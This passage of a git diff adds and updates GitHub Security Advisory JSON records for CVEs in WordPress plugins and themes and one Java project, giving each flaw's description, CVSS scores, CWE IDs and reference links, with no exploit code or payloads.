+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/easy-taxonomy-images/vulnerability/wordpress-easy-taxonomy-images-plugin-1-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-wfqx-2rhq-j78p/GHSA-wfqx-2rhq-j78p.json b/advisories/unreviewed/2026/02/GHSA-wfqx-2rhq-j78p/GHSA-wfqx-2rhq-j78p.json
new file mode 100644
index 0000000000000..9328aaa35b0ea
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-wfqx-2rhq-j78p/GHSA-wfqx-2rhq-j78p.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wfqx-2rhq-j78p",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-68005"
+ ],
+ "details": "Missing Authorization vulnerability in themewant Easy Hotel Booking easy-hotel allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easy Hotel Booking: from n/a through <= 1.8.7.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68005"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/easy-hotel/vulnerability/wordpress-easy-hotel-booking-plugin-1-8-0-broken-access-control-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:06Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-wfqx-gw86-rc8h/GHSA-wfqx-gw86-rc8h.json b/advisories/unreviewed/2026/02/GHSA-wfqx-gw86-rc8h/GHSA-wfqx-gw86-rc8h.json
new file mode 100644
index 0000000000000..7d5d118f2dbb2
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-wfqx-gw86-rc8h/GHSA-wfqx-gw86-rc8h.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wfqx-gw86-rc8h",
+ "modified": "2026-02-20T18:31:35Z",
+ "published": "2026-02-20T18:31:35Z",
+ "aliases": [
+ "CVE-2025-68539"
+ ],
+ "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Fana fana allows PHP Local File Inclusion.This issue affects Fana: from n/a through <= 1.1.35.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68539"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/fana/vulnerability/wordpress-fana-theme-1-1-35-local-file-inclusion-vulnerability-2?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-98"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-wg3c-3523-f9fc/GHSA-wg3c-3523-f9fc.json b/advisories/unreviewed/2026/02/GHSA-wg3c-3523-f9fc/GHSA-wg3c-3523-f9fc.json
new file mode 100644
index 0000000000000..7ebc37ca853e3
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-wg3c-3523-f9fc/GHSA-wg3c-3523-f9fc.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wg3c-3523-f9fc",
+ "modified": "2026-02-20T18:31:35Z",
+ "published": "2026-02-20T18:31:35Z",
+ "aliases": [
+ "CVE-2025-68855"
+ ],
+ "details": "Insertion of Sensitive Information Into Sent Data vulnerability in themeglow JobBoard Job listing job-board-light allows Retrieve Embedded Sensitive Data.This issue affects JobBoard Job listing: from n/a through <= 1.2.8.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68855"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/job-board-light/vulnerability/wordpress-jobboard-job-listing-plugin-1-2-8-sensitive-data-exposure-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-201"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:14Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-wgg5-6gv9-fvpp/GHSA-wgg5-6gv9-fvpp.json b/advisories/unreviewed/2026/02/GHSA-wgg5-6gv9-fvpp/GHSA-wgg5-6gv9-fvpp.json
new file mode 100644
index 0000000000000..28de38c396cbe
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-wgg5-6gv9-fvpp/GHSA-wgg5-6gv9-fvpp.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wgg5-6gv9-fvpp",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-67977"
+ ],
+ "details": "Missing Authorization vulnerability in VillaTheme HAPPY happy-helpdesk-support-ticket-system allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects HAPPY: from n/a through <= 1.0.8.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67977"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/happy-helpdesk-support-ticket-system/vulnerability/wordpress-happy-plugin-1-0-8-broken-access-control-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:03Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-wh7w-625p-7j85/GHSA-wh7w-625p-7j85.json b/advisories/unreviewed/2026/02/GHSA-wh7w-625p-7j85/GHSA-wh7w-625p-7j85.json
index 2cfdd410bd542..dbac3fa4b1378 100644
--- a/advisories/unreviewed/2026/02/GHSA-wh7w-625p-7j85/GHSA-wh7w-625p-7j85.json
+++ b/advisories/unreviewed/2026/02/GHSA-wh7w-625p-7j85/GHSA-wh7w-625p-7j85.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-wh7w-625p-7j85",
- "modified": "2026-02-19T21:30:48Z",
+ "modified": "2026-02-20T18:31:32Z",
 "published": "2026-02-19T21:30:48Z",
 "aliases": [
 "CVE-2026-27387"
 ],
 "details": "Missing Authorization vulnerability in designinvento DirectoryPress directorypress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects DirectoryPress: from n/a through <= 3.6.26.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-862"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T21:18:33Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-wm24-gwfw-426w/GHSA-wm24-gwfw-426w.json b/advisories/unreviewed/2026/02/GHSA-wm24-gwfw-426w/GHSA-wm24-gwfw-426w.json
new file mode 100644
index 0000000000000..0c97c8eb879ed
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-wm24-gwfw-426w/GHSA-wm24-gwfw-426w.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wm24-gwfw-426w",
+ "modified": "2026-02-20T18:31:38Z",
+ "published": "2026-02-20T18:31:38Z",
+ "aliases": [
+ "CVE-2026-22373"
+ ],
+ "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Fooddy fooddy allows PHP Local File Inclusion.This issue affects Fooddy: from n/a through <= 1.3.10.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22373"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/fooddy/vulnerability/wordpress-fooddy-theme-1-3-10-local-file-inclusion-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-98"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:36Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-wm24-v2x8-m9pj/GHSA-wm24-v2x8-m9pj.json b/advisories/unreviewed/2026/02/GHSA-wm24-v2x8-m9pj/GHSA-wm24-v2x8-m9pj.json
new file mode 100644
index 0000000000000..ce13f60bcb10d
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-wm24-v2x8-m9pj/GHSA-wm24-v2x8-m9pj.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wm24-v2x8-m9pj",
+ "modified": "2026-02-20T18:31:38Z",
+ "published": "2026-02-20T18:31:38Z",
+ "aliases": [
+ "CVE-2025-69410"
+ ],
+ "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Edge-Themes Belletrist belletrist allows PHP Local File Inclusion.This issue affects Belletrist: from n/a through <= 1.2.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69410"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/belletrist/vulnerability/wordpress-belletrist-theme-1-2-local-file-inclusion-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-98"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:29Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-wq4c-m266-6c9g/GHSA-wq4c-m266-6c9g.json b/advisories/unreviewed/2026/02/GHSA-wq4c-m266-6c9g/GHSA-wq4c-m266-6c9g.json
index 97e1557334937..0399e4ed4c474 100644
--- a/advisories/unreviewed/2026/02/GHSA-wq4c-m266-6c9g/GHSA-wq4c-m266-6c9g.json
+++ b/advisories/unreviewed/2026/02/GHSA-wq4c-m266-6c9g/GHSA-wq4c-m266-6c9g.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-wq4c-m266-6c9g",
- "modified": "2026-02-19T18:31:53Z",
+ "modified": "2026-02-20T18:31:27Z",
 "published": "2026-02-19T18:31:53Z",
 "aliases": [
 "CVE-2026-25453"
 ],
 "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in mdempfle Advanced iFrame advanced-iframe allows DOM-Based XSS.This issue affects Advanced iFrame: from n/a through <= 2025.10.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T09:16:24Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-wqcv-67x3-mx26/GHSA-wqcv-67x3-mx26.json b/advisories/unreviewed/2026/02/GHSA-wqcv-67x3-mx26/GHSA-wqcv-67x3-mx26.json
new file mode 100644
index 0000000000000..6968fdd26c4e3
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-wqcv-67x3-mx26/GHSA-wqcv-67x3-mx26.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wqcv-67x3-mx26",
+ "modified": "2026-02-20T18:31:39Z",
+ "published": "2026-02-20T18:31:39Z",
+ "aliases": [
+ "CVE-2026-24956"
+ ],
+ "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Shahjada Download Manager Addons for Elementor wpdm-elementor allows Blind SQL Injection.This issue affects Download Manager Addons for Elementor: from n/a through <= 1.3.0.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24956"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/wpdm-elementor/vulnerability/wordpress-download-manager-addons-for-elementor-plugin-1-3-0-sql-injection-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:39Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-wqpx-frj2-7xmj/GHSA-wqpx-frj2-7xmj.json b/advisories/unreviewed/2026/02/GHSA-wqpx-frj2-7xmj/GHSA-wqpx-frj2-7xmj.json
new file mode 100644
index 0000000000000..d42635c0b7521
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-wqpx-frj2-7xmj/GHSA-wqpx-frj2-7xmj.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wqpx-frj2-7xmj",
+ "modified": "2026-02-20T18:31:39Z",
+ "published": "2026-02-20T18:31:39Z",
+ "aliases": [
+ "CVE-2026-26102"
+ ],
+ "details": "Incorrect Permission Assignment for Critical Resource in Owl opds 2.2.0.4 allows File Manipulation via a crafted network request.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26102"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2026-26102"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-732"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T17:25:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-wrqv-46c5-q67w/GHSA-wrqv-46c5-q67w.json b/advisories/unreviewed/2026/02/GHSA-wrqv-46c5-q67w/GHSA-wrqv-46c5-q67w.json
new file mode 100644
index 0000000000000..953587e042e26
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-wrqv-46c5-q67w/GHSA-wrqv-46c5-q67w.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wrqv-46c5-q67w",
+ "modified": "2026-02-20T18:31:38Z",
+ "published": "2026-02-20T18:31:38Z",
+ "aliases": [
+ "CVE-2026-22383"
+ ],
+ "details": "Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes PawFriends - Pet Shop and Veterinary WordPress Theme pawfriends allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PawFriends - Pet Shop and Veterinary WordPress Theme: from n/a through <= 1.3.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22383"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/pawfriends/vulnerability/wordpress-pawfriends-pet-shop-and-veterinary-wordpress-theme-theme-1-3-insecure-direct-object-references-idor-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-639"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:37Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-wv4q-94jw-h996/GHSA-wv4q-94jw-h996.json b/advisories/unreviewed/2026/02/GHSA-wv4q-94jw-h996/GHSA-wv4q-94jw-h996.json
new file mode 100644
index 0000000000000..12b48bed071c4
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-wv4q-94jw-h996/GHSA-wv4q-94jw-h996.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wv4q-94jw-h996",
+ "modified": "2026-02-20T18:31:35Z",
+ "published": "2026-02-20T18:31:35Z",
+ "aliases": [
+ "CVE-2025-68526"
+ ],
+ "details": "Deserialization of Untrusted Data vulnerability in A WP Life Modal Popup Box modal-popup-box allows Object Injection.This issue affects Modal Popup Box: from n/a through <= 1.6.1.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68526"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/modal-popup-box/vulnerability/wordpress-modal-popup-box-plugin-1-6-1-php-object-injection-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-502"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-ww4h-gqqf-68h9/GHSA-ww4h-gqqf-68h9.json b/advisories/unreviewed/2026/02/GHSA-ww4h-gqqf-68h9/GHSA-ww4h-gqqf-68h9.json
new file mode 100644
index 0000000000000..cd2bef6b8b7c6
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-ww4h-gqqf-68h9/GHSA-ww4h-gqqf-68h9.json
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-ww4h-gqqf-68h9",
+ "modified": "2026-02-20T18:31:40Z",
+ "published": "2026-02-20T18:31:40Z",
+ "aliases": [
+ "CVE-2026-2849"
+ ],
+ "details": "A vulnerability has been found in yeqifu warehouse up to aaf29962ba407d22d991781de28796ee7b4670e4. Affected by this issue is the function deleteCache/removeAllCache/syncCache of the file dataset\\repos\\warehouse\\src\\main\\java\\com\\yeqifu\\sys\\controller\\CacheController.java of the component Cache Sync Handler. Such manipulation leads to improper access controls. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The project was informed of the problem early through an issue report but has not responded yet.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2849"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/yeqifu/warehouse/issues/60"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/yeqifu/warehouse/issues/60#issue-3846666902"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/yeqifu/warehouse"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347085"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347085"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.754428"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-266"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T17:25:58Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-wxg7-qr4v-6w49/GHSA-wxg7-qr4v-6w49.json b/advisories/unreviewed/2026/02/GHSA-wxg7-qr4v-6w49/GHSA-wxg7-qr4v-6w49.json
new file mode 100644
index 0000000000000..04a0dff2d8dcb
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-wxg7-qr4v-6w49/GHSA-wxg7-qr4v-6w49.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wxg7-qr4v-6w49",
+ "modified": "2026-02-20T18:31:36Z",
+ "published": "2026-02-20T18:31:36Z",
+ "aliases": [
+ "CVE-2025-69371"
+ ],
+ "details": "Deserialization of Untrusted Data vulnerability in AncoraThemes KindlyCare kindlycare allows Object Injection.This issue affects KindlyCare: from n/a through <= 1.6.1.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69371"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/kindlycare/vulnerability/wordpress-kindlycare-theme-1-6-1-php-object-injection-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-502"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:21Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-x25m-mgjq-j9gg/GHSA-x25m-mgjq-j9gg.json b/advisories/unreviewed/2026/02/GHSA-x25m-mgjq-j9gg/GHSA-x25m-mgjq-j9gg.json
new file mode 100644
index 0000000000000..c292791304e30
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-x25m-mgjq-j9gg/GHSA-x25m-mgjq-j9gg.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-x25m-mgjq-j9gg",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-68026"
+ ],
+ "details": "Missing Authorization vulnerability in Niaj Morshed LC Wizard ghl-wizard allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects LC Wizard: from n/a through <= 2.1.1.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68026"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/ghl-wizard/vulnerability/wordpress-lc-wizard-plugin-2-1-0-settings-change-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-x57h-c6qr-3m4q/GHSA-x57h-c6qr-3m4q.json b/advisories/unreviewed/2026/02/GHSA-x57h-c6qr-3m4q/GHSA-x57h-c6qr-3m4q.json
new file mode 100644
index 0000000000000..c819e34199f9c
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-x57h-c6qr-3m4q/GHSA-x57h-c6qr-3m4q.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-x57h-c6qr-3m4q",
+ "modified": "2026-02-20T18:31:38Z",
+ "published": "2026-02-20T18:31:38Z",
+ "aliases": [
+ "CVE-2026-22376"
+ ],
+ "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Parkivia parkivia allows PHP Local File Inclusion.This issue affects Parkivia: from n/a through <= 1.1.9.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22376"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/parkivia/vulnerability/wordpress-parkivia-theme-1-1-9-local-file-inclusion-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-98"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:37Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-x648-6h35-89x6/GHSA-x648-6h35-89x6.json b/advisories/unreviewed/2026/02/GHSA-x648-6h35-89x6/GHSA-x648-6h35-89x6.json
index 0a7a54aed1d6f..5372b368f4151 100644
--- a/advisories/unreviewed/2026/02/GHSA-x648-6h35-89x6/GHSA-x648-6h35-89x6.json
+++ b/advisories/unreviewed/2026/02/GHSA-x648-6h35-89x6/GHSA-x648-6h35-89x6.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-x648-6h35-89x6",
- "modified": "2026-02-19T18:31:51Z",
+ "modified": "2026-02-20T18:31:27Z",
 "published": "2026-02-19T18:31:51Z",
 "aliases": [
 "CVE-2026-25005"
 ],
 "details": "Authorization Bypass Through User-Controlled Key vulnerability in N-Media Frontend File Manager nmedia-user-file-uploader allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Frontend File Manager: from n/a through <= 23.5.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-639"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T09:16:14Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-x6m2-4qvv-ghf6/GHSA-x6m2-4qvv-ghf6.json b/advisories/unreviewed/2026/02/GHSA-x6m2-4qvv-ghf6/GHSA-x6m2-4qvv-ghf6.json
new file mode 100644
index 0000000000000..63ac5f6018190
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-x6m2-4qvv-ghf6/GHSA-x6m2-4qvv-ghf6.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-x6m2-4qvv-ghf6",
+ "modified": "2026-02-20T18:31:36Z",
+ "published": "2026-02-20T18:31:36Z",
+ "aliases": [
+ "CVE-2025-69367"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GT3themes Oyster - Photography WordPress Theme oyster allows DOM-Based XSS.This issue affects Oyster - Photography WordPress Theme: from n/a through <= 4.4.3.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69367"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/oyster/vulnerability/wordpress-oyster-photography-wordpress-theme-theme-4-4-3-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:20Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-xcg8-79j4-g746/GHSA-xcg8-79j4-g746.json b/advisories/unreviewed/2026/02/GHSA-xcg8-79j4-g746/GHSA-xcg8-79j4-g746.json
new file mode 100644
index 0000000000000..34f8f8468f012
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-xcg8-79j4-g746/GHSA-xcg8-79j4-g746.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xcg8-79j4-g746",
+ "modified": "2026-02-20T18:31:37Z",
+ "published": "2026-02-20T18:31:37Z",
+ "aliases": [
+ "CVE-2025-69382"
+ ],
+ "details": "Deserialization of Untrusted Data vulnerability in themesflat Themesflat Elementor themesflat-elementor allows Object Injection.This issue affects Themesflat Elementor: from n/a through <= 1.0.1.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
